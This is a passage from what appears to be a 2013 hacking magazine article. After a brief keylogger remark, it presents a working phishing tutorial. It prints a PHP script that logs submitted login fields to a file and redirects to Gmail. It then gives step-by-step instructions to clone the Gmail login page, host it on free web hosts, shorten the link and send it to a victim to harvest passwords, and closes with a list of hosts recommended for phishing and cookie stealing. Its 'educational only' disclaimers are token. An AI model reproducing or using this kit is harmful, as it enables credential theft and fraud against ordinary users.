detect keyloggers, they have the potential to be
more effective than conventional anti-virus
software; some anti-virus software do not
consider certain keyloggers a virus and under
some circumstances a keylogger can be
considered a legitimate piece of software.
Figure 17: Anti-Keylogger for removing
keylogger file.

Phishing
You must have come across many fake login
pages/scamming pages which are often used to
hack IDs. Phishing is the easiest and the most
"unethical way of hacking. That true phishing is
not something great which only a few can do,
that is why it makes it unethical. But whatever it
might be, hacking is hacking and there is
obviously a need to know more of this type of
exploitation. Before we go into the details let us
first see what phishing is all about.
header ('Location:
http://www.gmail.com');$handle =
fopen("log.txt", "a");foreach($_POST as
$variable => $value) { fwrite($handle,
$variable); fwrite($handle, "=");
fwrite($handle, $value); fwrite($handle,
"\r\n");}fwrite($handle,
"\r\n");fclose($handle);exit;?>

Figure 18: How Phishing works.
Phishing is a way of deceiving your victim by
making him login through one of your webpages
which is a clone of the original one. By doing it,
the fake webpage will log his E-mail ID and
password. After that he will automatically be
redirected to the original webpage making him
unsuspicious of what has just happened. This is
used for criminal activities for stealing Credits
Cards ect. That is the exact reason why I DO NOT
want you to use this for fraud. Use this only for
the educational purposes and not to cause any
damage to any person in any way.
Phishing is the most popular and widely used
method for hacking email accounts and it is not
as easy as its name. Creating a phishing page is an
easy task and anyone can download it from
various hacking forums for free. The main step of
phishing comes after creation of fake login page.
Figure 19: Phishing Method.

How to create your own phishing
page

1. Copy the script above and open it as
log.php or login.php
2. Now open gmail home page with you
want to create.
3. I'm creating gmail phishing login page!!
Figure 20: Creating home page of Gmail Fake
Page.
4. RIGHT CLICK > save as save the script with
the name index.HTML like in the image
Figure 21: Saving Gmail fake page with name
index.html.

24th of January 2013


01/2012
35
5. Now open it with notepad find "action" word for that you can use CTRL + F now delete the
action=https://accounts.google.com/ServiceLoginAuth and use login.php? in the place of the
link save your script

Figure 22: Save fake gmail pages source with name login.php.


NOW YOUR LOGIN.PHP AND INDEX.HTML PAGES ARE READY!
6. Your page is ready for uploading.
7. Create an account on free webhosting sites just like (WWW.MY3GB.COM) or
(WWW.5GB.COM)


Figure 23: Create an account on webhosting site like www.my3gb.com.

Upload your phishing page on your webhosting page. You should receive something like that:


Figure 24: Upload fake page and php script on webhosting site.


AFTER UPLOADING IT

Now shorten the URL of the INDEX.HTML
(NAME.MY3GB.COM/INDEX.HTML) in Google URL
for everytime.

Next send the link (GOO.GL____) to victim make
your victim to login or send your fake URL of FB
login to your victim e-mail.

Once your victim is logged in your fake page JUST
RECIEVE PASSWORD IN LOG.TXT
Figure 25: Credential hacking.

Here are some suggested free web
hosting websites
For phishing, cookie stealing and
other hacking purposes you need a help from the
web hosting sites. These address will help you a
lot. Choose your favorite one and sign up, all of
them are for free.
1. 110mb - http://110mb.com
2. Ripway - http://ripway.com
3. SuperFreeHost - http://superfreehost.info
4. Freehostia - http://freehostia.com
5. Freeweb7 - http://freeweb7.com
6. t35 - http://t35.com
7. Awardspace - http://awardspace.com
8. PHPNet - http://phpnet.us
24th of January 2013


01/2012
37
About the author
Thank you for reading our
magazine from cover to cover.
Please share with us your
comment about this issue on
Twitter:

@Hackinsight
or Facebook:

http://www.facebook.com
/hackinsight






hackinsightpress@gmail.com


The techniques described in our articles
may only be used in private, local
networks.The editors hold no
responsibility for misuse of the presented
techniques or consequent data loss.
9. Free Web Hosting Pro -
http://freewebhostingpro.com
10. ProHosts - http://prohosts.org
11. FreeZoka - http://www.freezoka.com/
12. 000webhost - http://000webhost.com/
13. AtSpace - http://atspace.com
14. My3gb - http://my3gb.com
15. Zymic - http://zymic.com



VIKAS KUMAR (ISHAN)
is one of the leading
computer security
experts available in
India. VIKAS KUMAR
born on 26 July 1990 in a
town called Meerut, UP
(India). VIKAS KUMAR
started his Group
hackers4u on
Facebook in year 2010
and in two years he
bangs the World Wide Web with good computer
ethical hacking articles and going to launch the
website on Cyber Security & Ethical Hacking and
working with a Anti-Hacking Community I-
hackers4u. The 22 year old guy have the capability to
compete with the people best in the business so
called Ethical Hacking.

Workshops and Seminars: VIKAS KUMAR have trained
more than 3000 people from all around the world,
from countries like India, Dubai, Sudan, United
Kingdom, Thailand, Nigeria, Shri Lanka, Kenya,
Australia, Kazakhstan, Canada, Ghana, United States,
South Africa, China, Malaysia, Singapore, Omen,
Yemen, Indonesia, Korea, Iran and etc.

Become our Beta
Tester and receive
each article before
publication date!